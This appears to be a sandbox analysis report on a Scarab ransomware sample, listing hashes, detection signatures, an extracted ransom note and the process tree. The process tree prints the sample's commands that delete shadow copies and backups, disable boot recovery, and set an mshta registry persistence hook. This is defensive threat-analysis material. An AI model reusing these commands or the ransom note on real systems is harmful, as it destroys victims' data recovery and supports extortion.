Overview

overview

10

Static

static

3

2272954a2c...5a.exe

windows7-x64

10

2272954a2c...5a.exe

windows10-2004-x64

10

72716d15ea...21.exe

windows7-x64

7

72716d15ea...21.exe

windows10-2004-x64

7

Bit Paymer.exe

windows7-x64

10

Bit Paymer.exe

windows10-2004-x64

10

KeepCalm.exe

windows7-x64

1

KeepCalm.exe

windows10-2004-x64

1

LockedIn.exe

windows7-x64

9

LockedIn.exe

windows10-2004-x64

9

NotPetya.dll

windows7-x64

10

NotPetya.dll

windows10-2004-x64

10

Purge.exe

windows7-x64

1

Purge.exe

windows10-2004-x64

1

Scarab.exe

windows7-x64

10

Scarab.exe

windows10-2004-x64

10

a631ad1b1a...4b.exe

windows7-x64

6

a631ad1b1a...4b.exe

windows10-2004-x64

6

a9053a3a52...bc.exe

windows7-x64

7

a9053a3a52...bc.exe

windows10-2004-x64

7

b764629e1f...1c.exe

windows7-x64

10

b764629e1f...1c.exe

windows10-2004-x64

10

cf89f70633...5c.exe

windows7-x64

1

cf89f70633...5c.exe

windows10-2004-x64

3

e951e82867...50.exe

windows7-x64

1

e951e82867...50.exe

windows10-2004-x64

1

fa0c321e1a...d2.exe

windows7-x64

9

fa0c321e1a...d2.exe

windows10-2004-x64

8

fc184274ad...27.exe

windows7-x64

10

fc184274ad...27.exe

windows10-2004-x64

10

Resubmissions

18-07-2024 07:25

240718-h84wjs1hpb 10

18-07-2024 07:19

240718-h51pqa1gng 10

17-07-2024 20:55

240717-zqkhmaydmq 10

17-07-2024 19:21

240717-x2pwdaycjb 10

Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-07-2024 20:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Scarab.exe

  • Size

    342KB

  • MD5

    6899003aaa63ab4397f9e32e0a1daf43

  • SHA1

    c22272ff0944d127992b393562871473b23ef8ea

  • SHA256

    53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5

  • SHA512

    d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc

  • SSDEEP

    6144:zmTLRf45/wAfqj6pjohSws+wZQtmk6LnAlnZ:eq5/tyjMLd+Rtmkc0

Score
10/10
defense_evasionexecutionimpactprivilege_escalationransomware

Malware Config

Extracted

Path

C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note
__________________________________________________________________________________________________ | | | *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** | |__________________________________________________________________________________________________| Your files are now encrypted! -----BEGIN PERSONAL IDENTIFIER----- pAQAAAAAAABoRd9wHZSJ90QkDEJ=o6rR3qPtnhi1a0SOEQIUSmjFtGRt2WRpXn4z0Raf7Di1VU+VWW=OeXKuWJdge+orhqLjM6rO 1brHVbH22qbbhWZKy1WOAtb1Z6shnsor+Ai09VyUqzVQRvBdQMpeN0XuhihC+xlQTLsRGdyurKvft7cLNbuW=TswMlV5QTjUwPNf ToXJP+4o9K0rOfeku0ivTYvAwtV3Wr=c20j9otpp+gdUr0+wL80FCNl4Fw2320lR0uWJPHfbAOA5UrXhg9aF5BSLoZtmoMn7UMAb IH=oBhX+SLSb2p=ZvKCkt+BunP65oQe1UEwx=M8+EooOrcpTBLHkCn=Oud7vEqW+BkFEgxQdoMjwgfLcjZEGRsi7CQxOlKK7V+M0 LhaTHz7IcIIHEEseCcG3qf3=kqY+G89teSqpEMvsNlmbn4CKE6jMAGG72i6uzqA4Es+gsnnXhquJ1I1Tw5=JHKEd=2Bh=oPFpnEg TIT4sRpdDguTZLLBJh8io1lLwIhWYnplA=cm6RFoh872SvWGtKJ24uA7fn4JNdFuIdMA+Lwk+nRJNAK1wEK6+WeSaI=HDfcSUoOH kCouWH75NKo5L8wDSx444zGg8ce5cdkFzF9uR1JcZsPYsIKXC8WJkEHi5qICSM04ICUUqsSWnGDQNbn2F+7syXLwDMYclNDjFjn2 ALml3HoZtM8dNaEPXobE6g9nat8rHUluhRpraLTW+IbwIcJwzt6jKTscqLlPgBCR7625ojAaHF474nYDTPTtMBdPS0v5L=uR9t1G PK5JtprBfOKA0U0AEJ2mjlNkI7RRjDuSqXddAOAZ=DRhHk -----END PERSONAL IDENTIFIER----- All your files have been encrypted due to a security problem with your PC. Now you should send us email with your personal identifier. This email will be as confirmation you are ready to pay for decryption key. You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Contact us using this email address: [email protected] Free decryption as guarantee! Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). __________________________________________________________________________________________________ | | | How to obtain Bitcoins? | | | | * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click | | 'Buy bitcoins', and select the seller by payment method and price: | | https://localbitcoins.com/buy_bitcoins | | * Also you can find other places to buy Bitcoins and beginners guide here: | | http://www.coindesk.com/information/how-can-i-buy-bitcoins | | | |__________________________________________________________________________________________________| __________________________________________________________________________________________________ | | | Attention! | | | | * Do not rename encrypted files. | | * Do not try to decrypt your data using third party software, it may cause permanent data loss. | | * Decryption of your files with the help of third parties may cause increased price | | (they add their fee to our) or you can become a victim of a scam. | | | |__________________________________________________________________________________________________|

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (224) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs
    defense_evasionprivilege_escalation
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\Scarab.exe
    "C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1576
    • C:\Users\Admin\AppData\Local\Temp\Scarab.exe
      "C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2104
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        3⤵
          PID:1768
        • C:\Users\Admin\AppData\Local\Temp\Scarab.exe
          "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
          3⤵
          • Suspicious use of SetThreadContext
          • Access Token Manipulation: Create Process with Token
          • Suspicious use of WriteProcessMemory
          PID:4972
          • C:\Users\Admin\AppData\Local\Temp\Scarab.exe
            "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
            4⤵
            • Checks computer location settings
            • Access Token Manipulation: Create Process with Token
            • Suspicious use of WriteProcessMemory
            PID:4784
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
              5⤵
                PID:3116
              • C:\Users\Admin\AppData\Roaming\sevnz.exe
                "C:\Users\Admin\AppData\Roaming\sevnz.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4368
                • C:\Users\Admin\AppData\Roaming\sevnz.exe
                  "C:\Users\Admin\AppData\Roaming\sevnz.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3048
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30}',i);}catch(e){}},10);"
                    7⤵
                      PID:3496
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                      7⤵
                        PID:4496
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE
                        7⤵
                          PID:2428
                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                            wmic SHADOWCOPY DELETE
                            8⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3088
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                          7⤵
                            PID:4388
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                            7⤵
                              PID:2172
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                              7⤵
                                PID:864
                          • C:\Windows\SysWOW64\mshta.exe
                            mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"
                            5⤵
                              PID:4124
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2964

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
                      Filesize

                      4KB

                      MD5

                      3e4b14e9531773cfac0b2b9a31b46e42

                      SHA1

                      b4a004919ad7a743103338fe910dcda078bb3ab6

                      SHA256

                      afd70092309d8caa0dc29efaa61791aedef78a3704e10b8f37474d5a2ee228a3

                      SHA512

                      a16e6949317ed76c4d9ffd15ea694bc8f6eb2c1bf5216befb7760ef33d93b67cb603c091f1907fedc6347ec01e9dafc053bebf2536497da422c1f8e9542ffafd

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\sevnz.exe
                      Filesize

                      342KB

                      MD5

                      6899003aaa63ab4397f9e32e0a1daf43

                      SHA1

                      c22272ff0944d127992b393562871473b23ef8ea

                      SHA256

                      53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5

                      SHA512

                      d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc

                      Download Submit

                    • memory/1576-1-0x0000000000570000-0x0000000000670000-memory.dmp

                      Filesize

                      1024KB

                      Download

                    • memory/2104-2-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/2104-3-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/2104-4-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/2104-5-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/2104-8-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-106-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-119-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-35-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-36-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-42-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-43-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-49-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-50-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-56-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-57-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-63-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-64-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-25-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-70-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-71-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-77-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-78-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-84-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-85-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-91-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-92-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-98-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-99-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-105-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-24-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-112-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-113-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-34-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-120-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-126-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-127-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-133-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-134-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-140-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-141-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-147-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-148-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-154-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-155-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-161-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-162-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-168-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-169-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-175-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-176-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-182-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-183-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-189-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-190-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-196-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-197-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/3048-198-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/4784-12-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/4784-14-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/4784-20-0x0000000000400000-0x0000000000441000-memory.dmp

                      Filesize

                      260KB

                      Download

                    • memory/4972-13-0x0000000000770000-0x0000000000870000-memory.dmp

                      Filesize

                      1024KB

                      Download